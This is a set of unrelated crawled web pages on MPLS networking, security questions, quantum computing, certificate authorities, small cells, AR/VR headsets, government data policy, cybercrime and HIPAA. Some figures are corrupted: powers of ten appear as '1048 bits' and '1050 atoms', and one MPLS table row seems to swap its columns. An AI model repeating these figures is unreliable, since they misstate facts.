The research is part of the “Too sweet for our own good: An investigation of the effects of higher plasma glucose on cerebral health” project led by Associate Professor Nicolas Cherbuin, which is part of the longitudinal PATH through life study led by Professor Kaarin Anstey at ANU.
“The work would not be possible without being able to longitudinally explore blood glucose in members of the general public,” said Dr Walsh.
Source: Kate Prestt – Australian National University
Image Source: image is credited to Erin Walsh.
Original Research: The study will appear in Diabetes & Metabolism. | <urn:uuid:4233d85a-8cb1-460c-85d8-eb5e87a71e1c> | CC-MAIN-2022-40 | https://debuglies.com/2017/08/31/healthy-glucose-levels-key-to-healthy-aging-brain/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00694.warc.gz | en | 0.937116 | 413 | 3.484375 | 3 |
“MPLS” is an abbreviation for “Multiprotocol Label Switching.” Data packets are assigned labels in an MPLS network. Instead of examining the packet, packet-forwarding decisions are made based purely on labels.
MPLS guides data from one node to the next based on labels for path instead of network addresses, avoiding complex lookups. At every point, a new label is attached to the packet until it reaches the destination.
MPLS guides data from one node to the next based on shortest labels for path instead of network addresses, avoiding complex lookups.
Leased Line –
A leased line is dedicated and high-speed connectivity built across two sites. Leased lines do not share the connectivity with any other customer and we get symmetric speed in both directions.
It is sometimes also known as a ‘Private Circuit’.Leased lines are older technology than MPLS and have been around a bit longer.
Related – Leased Line vs Broadband
Both Leased Lines and MPLS are available over copper and Fiber medium and support high bandwidths up to Gbps. Additionally both support voice and data services, however, there are parameters on which they differ.
MPLS vs Leased Line –
|Segregation of customer traffic||Logical separation of customer traffic.||Physical separation of customer traffic
|Connectivity Type||Multipoint or point-to-Point||Point-to-Point
|Security||High level by logical separation of traffic||Most secured due to physical separation of traffic
|Skill Requirement||Highly skilled resources at Provider/customer end for deployment of MPLS.||Less skilled resources required for setup of Leased links.
|Spoke to Spoke communication||Remote site needs to traverse viz Hub site to reach other remote site||Direct any to any communication from one Spoke to other
|CAPEX and OPEX||Usually lower cost than P2P Leased links||Higher than MPLS Links
|Physical medium||Shared across multiple customers||Dedicated to customer
|Performance||Improved performance especially when Spoke to Spoke communication||Low performance in Spoke to Spoke communication since HUB incurs additional hop which is not the case in MPLS
|Routing decision||Service provider is involved in Layer 3 Routing of the customer traffic||Service provider does not involve in Routing decision of customer traffic.
|QOS||Service provider QOS for prioritization of delay sensitive and mission critical traffic.||Partially or no QoS
|Traffic Engineering||In MPLS it is possible to set the path that the traffic will have to take through the network.||Not possible in case of Leased links.
|Scalability ||MPLS is as an efficient technology that is easily scaled.||Leased lines are the most difficult to scale, both because of the time needed for deployment and the expense.
|Recommended for ||* Large enterprise with a requirement for secure and private network|
* Have multiple sites spread across a large area.
* Fast growing organization with inorganic growth of sites
|* Require guaranteed bandwidth
* Need to transfer large data reliably and fast between sites
Download the difference table here. | <urn:uuid:a4abf30c-4144-45a9-aa1f-dcc4269877d9> | CC-MAIN-2022-40 | https://ipwithease.com/mpls-vs-leased-line/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00694.warc.gz | en | 0.912976 | 731 | 2.78125 | 3 |
We are constantly hearing new and revised advice on thinking up and managing passwords, but sometimes we have to deal with more than just passwords when it comes to online security. Some sites also require answers to a series of security questions that can later be used to verify your account or recover a lost password.
In recent years, experts have reconsidered the use of security questions, which may ask you to remember personal tidbits like your pet’s name or the first street you lived on. On one hand, these can be easy to answer, but they may lend you a false sense of security.
There are certain classic questions that pop up again and again, like “What is your mother’s maiden name?” or “What was your high school mascot?” One of the biggest problems with these sort of questions is the answers can be easy to find. Your mother’s maiden name is likely a matter of public record and by simply knowing the name of your high school, a thief can figure out the mascot.
Hackers that accessed user accounts, like with the infamous Yahoo data breach, have also been able to access user security questions and answers. So how can we better secure our security questions? One possible approach is to simply lie about your answers, but even that has some potential pitfalls.
Google’s take on security questions
A 2015 study conducted by Google researchers concluded that “secret questions generally offer a security level that is far lower than user-chosen passwords.” It also uncovered a problem where people who lie about their answers later forget those made-up answers, which made it more difficult for them to recover forgotten passwords.
Ultimately, the researchers say, “We conclude that it appears next to impossible to find secret questions that are both secure and memorable.” While the Google research isn’t optimistic about these kind of questions, they are still in use for a lot of websites, so we need to adapt.
How to manage your security answers
Now back to the idea of lying about your answers. How can you field these sort of questions in a more secure way without forgetting your fictional answers? One solution is to use a password manager, which lets you use hard-to-crack passwords without having to remember each and every one. Most password managers let you keep secure notes. This is where you can store your made-up answers.
If you’re not using a password manager, then be sure you come up with fake answers you can replicate later. For example, if the question asks for your mother’s maiden name, you might instead use your grandmother’s middle name or the maiden name of a favorite celebrity.
If the site gives you the option to create your own security questions, then take advantage of that and come up with obscure questions that would not be easy to find by searching you out online or looking at your Facebook or Twitter profile. You might go with something like “What is the name of your imaginary friend from childhood?” or “What band poster did you have on your wall in college?”
Security questions may one day become obsolete, but in the meantime, it’s smart to take some steps to keep your answers as secure as possible. This is one time where a little lying is perfectly acceptable. | <urn:uuid:55340d40-57e0-47cd-808a-e8a85c94e5ad> | CC-MAIN-2022-40 | https://gulfsouthtech.com/uncategorized/one-lie-security-experts-use-all-the-time-and-you-should-too/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00694.warc.gz | en | 0.957389 | 683 | 2.703125 | 3 |
Able to calculate problems at an astronomical scale, quantum computing is getting closer to reality.
For years technologists have questioned how much longer we might expect the current rate of advancement in computing continue.
While Moore’s Law has promised that the speed and capability of computers will double every two years, this has meant components have had to be made smaller and smaller. Barriers loom however in the form of manufacturers’ abilities to work at these microscopic scales.
But while making components smaller can be problematic, the properties of physics that operate at the atomic scale also holds the key to unleashing computing power much greater than Moore’s Law has ever promised.
Called quantum computing, this next generation of computers take advantage of a set of properties called quantum mechanics, and their specific ability to allow particles to exist in multiple simultaneous states, called superposition.
According to the vice president and head of exploratory science and university partnerships at IBM Research, Jeff Welser, quantum computing can be thought of as an extension beyond what we can do with a classical computer.
Classical systems represent information as a ‘bit’, where its state is either one or zero (the foundation for binary computing), while in quantum computing a bit can exist in multiple compute states simultaneously, known as qubits.
“What that means is you can test large combinations of ones and zeros across qubits simultaneously, so it allows you to explore potential solutions to very large problems,” Welser says.
One of the key application areas for quantum computing is in chemistry, where Welser says it will have applications in materials science.
“Maybe you’re trying to discover new molecules for pharmaceuticals,” he says. “So let’s take the molecule caffeine, which has 95 electrons on it. If you wanted to do a simulation of that molecule on a standard classical computing system you need to have a supercomputer with 1048 bits.
“To give you a reference point, there are 1050 atoms in the entire Earth. There’s just no way you could ever build a system big enough to even do that computation.”
However, Welser says with a quantum computer that task could be completed using just 160 qubits. IBM has already released a system with 65 qubits and has plans to release a 1000-qubit system by 2023.
However, in addition to needing to build scale, he cautions that today’s quantum computers are still relatively error prone. Hence IBM is working to improve the error rate and to encode error correction into their quantum systems.
“When we reach that point — 1000 qubits — assuming we have enough error correction control, that should be enough to start doing some interesting things in chemistry and material science,” Welser says.
IBM is already fielding interest in quantum computers from companies including Daimler AG, the parent company of Mercedes-Benz, to model the materials used in next generation batteries for electric vehicles. IBM is also working with the bank JP Morgan Chase to solve optimisation problems in the financial services sector.
“The companies that are interested are ones that are bumping up against the limits of what they can do with current classical systems, so they want to actually start experimenting with quantum,” Welser says.
While many of the benefits of quantum computing are reliant on the creation of suitably powerful systems, Welser says IBM is also investing in creating a community of people with the skills needed to make use of them. Since 2016, when IBM put the first quantum computer on the cloud, anyone can access the company’s public quantum systems through the IBM Quantum Experience. And organizations can access their premium systems by joining the IBM Q Network. IBM has also been contributing to the creation of an open source software kit called Qiskit which provides a quantum-oriented software programming tools.
“For quantum computing to take off it requires a very large ecosystem of people utilising it, finding how to apply it, learning how to use it, and building better software for it,” Welser says.
Ultimately, he says the contribution that quantum computing can make in fields such as material science will play a vital role in solving some of the most complex challenges facing humanity.
“If you think about a lot of the problems we face today, with the climate, with sustainability, or even fighting pandemics, a lot of it does involve the finding of new materials and new substances that can help us,” Welser says. “If we have systems that can not only do high performance computing like we have today, but also do very large problems and even quantum simulations, all of these combined could really offer a powerful way of discovering new materials.”
Author: Dr Mohammad Choucair, CEO Archer Materials If I say to you that quantum computing represents the next generation of powerful computing, does that seem realistic? Will it happen? Or is it simply the dream of theoretical physicists? I believe that quantum deserves our urgent attention today, not in some distant future. There are huge, […]
Originally published in The Australian. Able to calculate problems at an astronomical scale, quantum computing is getting closer to reality. For years technologists have questioned how much longer we might expect the current rate of advancement in computing continue. While Moore’s Law has promised that the speed and capability of computers will double every two […]
Author: Jodie Sangster, Chief Marketing Officer, IBM Australia & New Zealand The ambition for most of us right now is to live in a world beyond the grips of COVID-19. While this year has presented all of us with incredible challenges, it has also created unique opportunities for businesses, governments and leaders across our society […]
For over 90 years, IBM has been working to solve some of the biggest issues facing Australia and New Zealand. Today, IBM has laid the foundation for a new era of business with leading hybrid cloud, cybersecurity, quantum and AI solutions.
These are our stories; this is IBM. | <urn:uuid:beaa9b9b-e207-4063-8ae6-bcac43ed443a> | CC-MAIN-2022-40 | https://www.ibm.com/blogs/ibm-anz/a-quantum-leap-for-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00094.warc.gz | en | 0.955352 | 1,249 | 3.53125 | 4 |
Public CAs are organizations which issue certificates to other organizations. Public CAs are generally trusted so certificates issued by them are validated and have higher levels of trust associated.The organization first does some necessary checks, including domain validation. Then the Public CA uses their private key to issue the requester a certificate while also attaching a public key that the requester can use.While someone establishes a connection, the certificate is validated with the Public CA by checking if the requester is the valid holder of the certificate. The public key is checked, and then a secure connection can be established using asymmetric encryption.
Private CA are an organization’s own local CA that is created for internal purposes only. The certificates issued are signed by the organization’s Private Root CA using its private key. Private CAs are used to build a private internal PKI network to issue certificates within the organization.They can be used to run devices and appliances within the organization and can be utilized by users for VPNs, Secure Email and can be used by servers for encrypting data in a database. | <urn:uuid:426f04dd-7e68-4b58-8edd-180fb22aeeb7> | CC-MAIN-2022-40 | https://www.encryptionconsulting.com/tag/public-ca/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00094.warc.gz | en | 0.950603 | 217 | 2.96875 | 3 |
What is Small Cell Technology?
What are Small Cells?
Mobile connectivity requirements are increasing at an unparalleled rate. Now that so many devices rely on wireless networks, particularly in highly populated areas such as towns and cities, network operators are forced to find robust solutions that allow for higher bandwidth than traditional options as well as remaining efficient in terms of power usage.
A recent approach taken by carriers has seen the introduction of small cell architecture in developing and developed markets around the world. Unlike traditional cellular networks, these small cells enable operators to increase the performance of the network connectivity for their consumers. That’s because they traditionally use large cell wireless transmitters to service a wide area, whereas a higher quantity of smaller cells are more effective; even out to the edge of existing networks.
What are the benefits of Small Cells in existing networks?
The greatest benefit of small cell architecture is superior coverage for the increased number of mobile consumers and independent devices requiring connectivity. In a time when we have begun to see IoT enabled products being launched and the demand for coverage increasing tenfold, small cells are providing the infrastructure for much needed connectivity.
Also, significant, costly investments aren’t required by operators for deploying small cells. This is because the small cell architecture utilizes additional base stations that extend the range of traditional cells. Therefore, individual devices can transmit data more effectively with these wider coverage areas and with reduced power consumption.
Small cell connectivity means that devices don’t struggle to maintain a connection over longer distances. This reduces the need for data correction or retransmission of lost packets. This in turn provides extended operating time for the mobile device and extended operating time for those devices that rely on power.
Other opportunities for Small Cell infrastructure
Aside from the obvious significant benefits for consumers connecting to mobile networks within cities and urban areas, there are also a number of other alternative deployments for small cell architecture, which could significantly improve existing networks.
Firstly, small cells could be deployed in large corporate/commercial environments where existing large cells are used to provide wireless connectivity but struggle with physical barriers creating obstructions. Instead an alternative would be to deploy small cells indoors allowing for hotspots to provide reliable coverage in areas that would have otherwise been out of service and suffered with signal degradation.
Small cells would also provide a great solution for other isolated areas and industries such as mining.
Get all of our latest news sent to your inbox each month. | <urn:uuid:5b3e89e0-9353-4644-a8d5-e05145e0fb2e> | CC-MAIN-2022-40 | https://www.carritech.com/news/small-cells/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00094.warc.gz | en | 0.948417 | 495 | 3.296875 | 3 |
As amazing as virtual worlds can be, they require a connection to the real world, the human user. Interface technologies are the crucial interpreter of virtual events toward experiences that humans can sense.
In augmented reality (AR), simple overlays on cellphone cameras’ view will provide a wealth of opportunities. Niantic’s AR game Pokémon Go from 2016 is an example of such uses.
Meanwhile, smart glasses – such as Google’s ill-fated early attempt with Google Glass from 2013 – are dedicated devices to overlay virtual elements in line of sight to avoid the need to handle and point a cellphone to access virtual information.
In virtual reality (VR), headsets dominate the market. Visual interfaces are at the centre of developers’ attention. It is the most obvious connection to human perception, but a sole focus on vision will limit extended reality (XR)’s applications and restrict the degree of immersiveness the new computing environment could conceivably achieve.
The article Understanding the metaverse – a discussion at SXSW mentions the US National Aeronautics and Space Administration (Nasa)’s Virtual Interface Environment Workstation (VIEW), an early example of a VR headset from 1990. A visual interface was a natural component of such a VR system, but engineers at that time had already experimented with additional interfaces to increase the system’s capabilities.
The system featured a headset very similar to today’s VR headsets, but it also included other interface technologies. The DataGlove is a glove with sensors that can detect finger movement, which can be used as an input device. Similarly, the DataSuit is a full-body garment capable of capturing information about the wearer’s body movement and their spatial orientation. At the time, DataGlove and DataSuit were only considered as input devices, not as output devices that would provide users with information or sensations.
XR, particularly VR, promises to create immersive experiences. To be truly immersive, limiting experiences to visuals and (often non-directional) audio will not be able to achieve the new technologies’ full potential. In fact, in some cases, addressing a range of sensations simultaneously will be necessary rather than desirable. In some therapeutic applications, improvements will rely on providing authentic replications of real-world conditions.
An example from 2017 offers a glimpse into the extent to which XR can envelop users. The University of Southern California’s Institute for Creative Technologies developed Bravemind – a VR-based interactive exposure-therapy tool for use in assessing and treating post-traumatic stress disorder (PTSD). Bravemind pairs video game-style computer-generated imagery with “realistic sensory stimuli – sounds, vibrations, even smells provided by a machine loaded with vials of scents – to approximate the circumstances of a war veteran’s traumatic memories.
The software’s 14 environments, ranging from remote Afghan villages to crowded Baghdad markets, include attackers, bombs, and innocent bystanders.
The current interface focus is on visual technologies – after all, in many applications, visual information by itself can be sufficient. AR sights that provide navigational information or VR landscapes that present architectural plans offer a substantial improvement over currently common approaches. No wonder so many companies work on headsets and glasses. The lists are long, even if looking at only a selection of devices.
VR headsets include HTC’s Vive, Meta Platforms’ Oculus Quest and its high-end, forthcoming Project Cambria, Sony’s VR2, Varjo’s high-end range of headsets, and Xiaomi’s Mi devices. And then there is a host of AR smart glasses. Again, a long list exists and includes Google Glass Magic leap, Nreal, Ray Ban and Snap’s Spectacles. Two other major players need to be mentioned. Microsoft markets its HoloLens2 headset as a mixed-reality device, while Apple’s efforts in AR and VR are shrouded in mystery and subject to the rumour mill, ranging from its working on AR devices to efforts to create a range of XR devices from high end to low end.
Headsets and smart glasses are the user interfaces that come to mind most readily when talking about XR environments and the metaverse. The lists above include well-known device manufacturers, prominent social media companies and a number of startups, with Magic Leap having had its share of notoriety and hype. But perhaps this most obvious vector of attacking the market of XR interfaces could very well be the most challenging as well.
This market arena might be subject to the majority fallacy. Different interpretations exist, but essentially, the thinking is that the major markets will attract a large number of players, ranging from large incumbents to well-funded startups – after all, a large market size translates into substantial revenue. But such an obvious market will also result in cut-throat competition and potentially razor-thin margins.
Consolidation and attrition
Over time, the market for these types of headset will divide into a number of segments that address specific needs, but consolidation and attrition of companies will happen during that period. In fact, the lower end of the market is already experiencing revenue threats. OpenAR, the Open Source Community for Augmented Reality, released in March 2022 a roadmap for DIY open AR glasses that outlines the community’s schedule until June 2026 of introducing a low-end interface with increasingly capable versions.
The version that was released in January 2022 can reportedly be put together for less than €20. The device is unwieldy and unlikely to catch the attention of any sizeable market, but it represents a start and the price point illustrate the community’s ambition. A range of alternative user interfaces will conceivably be able to carve out market niches that might not feature the same revenue potential as headsets and smart glasses – although some might – but promise very high profit margins for companies willing to focus on specialised or high-end applications.
Arguably, at the low end of the spectrum, simple, large-size displays that are embedded in clothing could represent a potential not only for AR applications such as advanced shopping and navigation, but also for simple entertainment services, such as content streaming and gaming. The concept attracted some interest more than 10 years ago, but never completely caught on – challenges persist of embedding electronics into flexible textiles that require occasional cleaning. Now, the concept might find renewed interest as an extension to smartphones and smart watches.
Read more about the metaverse
- The metaverse will make it easier to access an increasing wealth of information, but it also will make it more difficult to distinguish real from fake, accurate from wrong – and that goes for information as well as the information sources themselves.
- Will the metaverse create a $1tn revenue market? Who knows? How long will it take to reach this lofty potential? Who can tell? Will people invest across this emerging landscape of speculative riches? You bet.
- As it develops, the metaverse is almost certain to become a highly competitive commercial playground, if not battlefield. It will likely not only establish highly profitable markets but also lead to high-profile failures.
At the high end, for individual users, companies are looking at the use of smart contact lenses that could even accommodate prescription vision correction. Mojo Vision’s Mojo Lens is a smart contact lens with a microLED display, for instance. The company is looking at general AR applications, and with corporation markets, sees its contact lens as an entry point to the metaverse. Intriguingly, other developers are targeting bio-sensing and drug-dispensing applications for contact lenses, so contact lenses could, theoretically, become multi-featured high-tech devices that address a number of consumer and healthcare needs.
A completely different question is where the augmentation should actually reside when shopping in stores or walking through museums, for instance. Should it occur on the smartphone, on smart glasses’ displays, or via holographic installations within stores of facilities. Axiom Holographics is one of the companies that offers such holographic systems, which can create a range of features, from table-size product displays to design prototypes. The company’s visuals still require dedicated glasses, which therefore limit their use to situations in which the audience can access such devices.
Holographic imagery that does not require devices at all has widespread use cases, such as in commercial settings ranging from retail space to conferences to showrooms. AV Concepts offers such applications that enable three-dimensional stage presentations which can find use in demonstrating new product applications, as well as performances by artists such as the late Tupac Shakur.
Holoxica is offering a range of 3D displays roughly resembling a range of sizes of current television sets, and Hypervsn is offering holographic smart walls. The advantages for commercial users are clear – viewers do not require dedicated devices, nor do they need to be compelled to activate their smartphones to see the XR-enabled content.
New inventions will enter the market. For example, in December 2021, Disney Enterprises received US patent 11,210,843 for a virtual-world simulator. Multiple projectors generate images to create 3D images and simultaneous localisation and mapping (SLAM) adjust them for visitors’ changing point of view. Guests at the attraction would therefore not require any devices, such as headsets or goggles, at all.
There will be a large market for XR headsets and AR smart glasses, but a wide range of solutions are competing within these product categories, and devices from other product categories are seeking to provide applications that can serve overlapping use cases. The race to succeed with interface technologies for XR systems has just begun – and we haven’t even scratched the surface. An even wider range of interface solutions will conceivably not only offer competing technologies, but will also be needed to fulfil the promise of truly immersive landscapes.
Martin Schwirn is the author of Small Data, Big Disruptions: How to Spot Signals of Change and Manage Uncertainty (ISBN 9781632651921). He is also senior adviser, strategic foresight at Business Finland, helping startups and incumbents to find their position in tomorrow’s marketplace. | <urn:uuid:923658a8-452a-489a-8f19-1716a585d8b2> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/Peeking-into-the-metaverse-Taking-a-look-at-VR-headsets-and-AR-smart-glasses | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00094.warc.gz | en | 0.934911 | 2,107 | 3.328125 | 3 |
The digital revolution, ubiquity of the internet and rise of big data have given government an unprecedented capability to produce, collect, utilize and disseminate a vast array of information and data. These trends have ushered in a new era of data-powered government innovation and citizen services based on the undeniable value in making government data widely available – to citizens, activists, companies, academics, and entrepreneurs. This is often referred to as the “open government” era,...
The digital revolution, ubiquity of the internet and rise of big data have given government an unprecedented capability to produce, collect, utilize and disseminate a vast array of information and data. These trends have ushered in a new era of data-powered government innovation and citizen services based on the undeniable value in making government data widely available – to citizens, activists, companies, academics, and entrepreneurs. This is often referred to as the “open government” era, which thrives on government transparency, public accountability and citizen-centered services.
Consequently, the last 20 years have seen a transformation of public policies – legislative, regulatory, and administrative – grounded in the philosophy that access to and dissemination of government data is a public right and that any constraints on access hinder transparency and accountability. While there is broad recognition of the need to maximize access to government data, the types of government data are increasingly diverse and complex. For instance, there are many cases where the government collects or licenses private sector data, often combining this data with other data produced by the government. These datasets are often referred to as “hybrid data” or “privately curated data” –data licensed to or collected by the government that comprises both public and private sources. Access to and use of hybrid data is increasingly critical for government to transform data into actionable information.
Given the focus and challenges that come with this transformation, I offer some ideas that agencies and Congress should consider over the short and long term.
A more balanced open data policy should acknowledge and encourage government utilization of the most accurate and cost-effective data available, whether public, private, or a combination of the two. Technology mandates to release all datasets to the public domain fail to serve the broader public interest.
The Obama-era open government policies created a valuable framework for the maximization of purely government data, but these need to be applied carefully and updated to reflect the importance of hybrid data and the growing trends in technology and government data use.
In its 2013 Open Data Policy, the Obama administration expressed a preference for data formats that are “nonproprietary, publicly available, and [with] no restrictions… placed upon their use.”
While a preference for openness is appropriate, effective policy should strive to avoid the unintended consequences of moving from preference to technology mandate when applied to hybrid data. Mandates that make public–private initiatives economically unfeasible serve nobody’s interests.
Policymakers should caution against statutory restrictions that limit new and innovative technological choices simply because they happen to be proprietary. Instead, a better aim for legislative and regulatory oversight would be encouraging the market and public entities to develop the most efficient and effective data solutions possible while maintaining appropriate openness.
So how do we achieve this balance?
The first concrete step toward answering this question should take form in a GAO study of executive agencies’ use of public, private, and hybrid data sets. This study should specifically evaluate current data quality, the tools needed to improve data quality (including curation), and potential improvements to the collection and reporting of government-award data.
Fortunately, Congress has already provided the foundation to help guide such an initiative. A GAO study on data quality should build on the work and recommendations of OMB Circular A-76, the Commission on Evidence-Based Policymaking and the House Committee on Oversight and Government Reform’s report on the Foundations for Evidence-Based Policymaking Act of 2017 (H. Rept. 115-411) to ensure the proper roles of government- and private-sector innovations.
The Committee on Oversight and Government Reform’s report language on the OPEN Government Data Act is particularly instructive for what propositions a GAO study should test:
Open formats and open licenses are necessary components of a default of openness because they remove barriers to accessing and using the data. The presumptions expand upon, but do not alter existing openness requirements related to the treatment of any work of the United States Government under section 105 of title 17 or any other rights regimes.
The default is only that – a default. There are instances where it could be inappropriate for the government to impose open license requirements, such as for data that the government uses and maintains but does not own. For example, an agency might contract with a commercial data provider to obtain data that, if the agency attempted to collect on its own, the agency would need to spend significant time and resources verifying. This bill is not intended to prevent agencies from contracting with commercial data providers to obtain data under restricted terms, when such contract is in the public interest and is the most cost-effective way to meet the federal government’s needs.
Studying these propositions will provide the necessary tools to develop a balanced open data policy that achieves the widest possible ease of use and transparency for all forms of data.
The digital revolution is an opportunity to achieve maximum public transparency and illuminate with sunshine previously opaque government programs and policies.
Legislation that translates the preference for openness into laws and regulations is a positive step, but policy makers should ensure these laws and regulations do not to enact a technology mandate with unintended and harmful consequences. The value of data is dramatically enriched by the quality of the data being provided. A tech mandate that effectively shuns the use of curated, or hybrid, data will usher in an era of data that is less reliable, less useful, less desirable, and more expensive. We cannot deprive government of the information and tools it needs to best serve and protect the public. It is time for the government, nonprofit, and private sectors to come together and formulate a balanced approach to the special case of “hybrid data.”
Rich Beutel is founder of Cyrrus Analytics, a government relations firm, and director of the Procurement Roundtable. He is also on the executive committee of ACT-IAC, working to implement reforms in IT acquisitions and to accelerate the cloud first mandate. Beutel served for over 10 years on Capitol Hill. Most recently, he was the lead acquisition and procurement policy counsel for Chairman Darrell Issa (R-Calif.) of the House Oversight and Government Reform Committee. | <urn:uuid:02cc204c-bd28-44d6-824d-6a1d5d1da9af> | CC-MAIN-2022-40 | https://federalnewsnetwork.com/commentary/2018/06/harnessing-the-power-of-a-data-driven-government/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00094.warc.gz | en | 0.924048 | 1,347 | 2.65625 | 3 |
Forget the lone wolf or script kiddie cyberattacks of old where individuals carried out malicious attacks just to prove they could. Cybercrime today is becoming professionalised with enterprising criminals building lucrative illegal businesses by using more sophisticated techniques in their attacks, being more ambitious in who they target, and even selling or licencing their own malware.
Recently, it has felt like not a day goes by without a cyber incident being reported. Increasingly, too, the cyberattacks of recent months have appeared more organised and targeted. Ciaran Martin, head of the new National Cyber Security Centre (NCSC), reported that UK public sector and infrastructure organisations are targeted by two significant cyberattacks every single day. In October 2016, it was discovered that at least 28 NHS trusts in England had been the victim of ransomware attacks. It has even been alleged that state-sponsored Russian hackers may have affected the outcome of the US presidential election.
Understandably, awareness of cyber security issues is therefore at an all-time high with consumers and business, while security experts are moving quickly to deploy the latest technologies to tackle this rapidly expanding threat landscape.
Man versus machine
Security researchers rely on the established technologies of machine learning and artificial intelligence (AI) which collect data from security attacks to build a database of known threat signatures. This allows them to use both genuine breaches and false positives to more accurately model threat behaviours and attack vectors in order to improve real-time detection of new as well as known threats.
The cooperation between man and machine through using these more sophisticated technologies creates a far more secure and efficient system. If an AI can be responsible for detecting and fixing vulnerabilities, it frees up researchers’ time to analyse the more complex threats, which they’ll in turn teach to the AI and add to the database.
However, there is concerning potential for AI to be misused – or turned against us. In the hands of criminals, off the shelf machine learning algorithms and AI code are already being used to improve the effectiveness of attacks and to stay ahead of detection.
Phishing attacks, for instance, where publicly available personal data is used to create a fake email with a malicious link or attachment, could be rendered far more convincing with the addition of AI. The AI could tailor phishing messages to mimic the writing style of the victim making a target far more likely to be convinced to click on malicious links or open unsolicited attachments.
Additionally, AI and machine learning technologies are used by cybercriminals to try to stay one step ahead of security defences by continually altering the code to avoid detection or providing it with improved attack methods. We have already seen the first AI vs AI cybersecurity battles (opens in new tab) waged in the lab and, with AI now a powerful tool in cybercriminals’ arsenal, in the real world.
Ransomware makes a mint
2016 was dubbed ‘The Year of Ransomware’, with the likes of Locky, Cerber and TeslaCrypt among the most prevalent malware strains identified. But this was only the tip of the iceberg. Over the course of 2016, Avast detected more than 150 new ransomware strains and in 2017, this has already more than doubled. The reason for the rapid proliferation of ransomware families is simply the success of this malware model for monetisation purposes.
Not only are criminals able to exploit the immediate victim for payment, but they now sometimes offer an innovative alternative to paying where victims recommend two other contacts to receive the malware instead, taking advantage of social engineering tactics to expand their malware distribution base more widely. It is usually the case that no matter what option a victim chooses – whether to pay or not, whether to pass on the malware to contacts or not – they will still lose their files and possibility access to their PC altogether.
Experts are tracking the development of the most prolific malware families have noted cybercriminals spending time adding in new languages to fool more victims, and regularly updating their code to make it harder for the security experts to prevent and mitigate – especially if the ransomware has already been activated on a user’s PC.
For consumers, ransomware can cripple their device and forever erase their most precious files. For businesses, an attack can not only expose them to privacy law breach and data protection issues but to a mass clean-up operation longstanding reputational damage.
Show me the money!
What’s more concerning is that wannabe cybercriminals today need not be skilled hacks. There are now more options than ever to create their own malware if they have only basic coding skills including DIY open-source ransomware programs and licensed malware development kits which are both easily found on hacking forums.
Even those without the necessary abilities can benefit from the RaaS (Ransomware as a Service) model. Automatically generated ransomware executables can be provided to anyone tempted to try their hand at cybercrime, creating a new army of budding cybercriminals. It is this availability of ‘malware for purchase’ which has changed unassociated instances of mischief making or theft into a real, lucrative underground economy with malware being a viable if illegal source of income.
Despite the huge risks it poses, there’s a knowledge gap around ransomware and how to protect against it. Avast’s small business arm, AVG Business, conducted research amongst SMBs specifically which found only 68% of small business owners had heard of ransomware, and only a third of those who thought they knew what it is could in fact accurately define it.
As with most cyber threats, education is and will continue to be, the best line of defence against ransomware. Companies need to begin driving the best security culture and emphasising best practices, such as keeping all software programmes up-to-date, as updates often contains security fixes, and thinking twice about unusual or unsolicited emails rather than automatically clicking on any links. For small businesses, which often lack dedicated IT support, having educated employees can be the best first line of defence.
New vulnerabilities, new defences
When smart devices, most notably smart phones and tablets, first came to prominence 10 years ago, cybersecurity practitioners were charged with the daunting task of securing organisational networks for this myriad of new access points. Once again, we see new technologies opening up potential avenues for cybercrime to exploit.
The Internet of Things (IoT) devices are increasingly commonplace in day-to-day life, both at work and in our homes. The rapid availability of these devices to market has been matched by enthusiastic early adopters – but at the cost of securing these devices properly. Mass produced hardware devices like web cams, printers and routers are increasingly being shipped without any security measures in place, making users vulnerable to attack. It’s clear why hackers love IoT devices – they are open doors to our private lives, our sensitive data, and our personal worlds.
Avast recently scanned 598,913 networks in the UK to understand the extent of the issue. The findings indicated that nearly half (47%) of all routers are vulnerable to a cyber breach, and 22% of all webcams and 5% of all printers were equally open to attack.
This highlights an important issue: that although the number of connected devices in our homes will continue to increase, the critical access point will remain the same - the router. The old standby of flashing firmware to keep pace with threats is inadequate, and the challenge is now for hardware manufacturers and security experts to work together to find a way to build security in from the ground up for smarter, safer devices.
As the threat landscape evolves, a collaborative, multi-layered approach will be necessary to keep our data safe. On the one hand, consumers and businesses need to take the initiative to understand the risks of using connected devices and online services and to take responsibility for keeping up with the key cybersecurity best practices around installing antivirus products, changing passwords and trying to spot fake emails, links and attachments.
On the other, cybersecurity experts will continue to focus on advancing the techniques and technologies to keep one step ahead of the criminals in this cyber game of cat and mouse. One thing that is certain is that, AI in the hands of the good guys is already a powerful and effective weapon against cybercrime, giving users the freedom to enjoy the benefits offered by the latest connected devices and technologies.
Ondrej Vlcek, EVP & GM, Consumer at Avast
Image Credit: Kim Britten / Shutterstock | <urn:uuid:3c15cad9-0bfe-49ba-a805-17b9ea418203> | CC-MAIN-2022-40 | https://www.itproportal.com/features/the-cybercrime-monetisation-system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00094.warc.gz | en | 0.949074 | 1,724 | 3.0625 | 3 |
Health Insurance Portability and Accountability Act
The Health Insurance Portability and Accountability Act of 1996 (HIPAA) is a comprehensive federal regulation that governs healthcare data mobility, handling, and other aspects of patient records.
Among the Act’s five Titles that oversee various parts of the healthcare landscape are Title II, its Administrative Simplification Act (AS, or ASA). The ASA spells out how patient records can be handled by healthcare providers and healthcare insurers to enhance privacy and provide patients with informed consent over how their records are shared. It also establishes baseline national standards for electronic patient records and how they may be used.
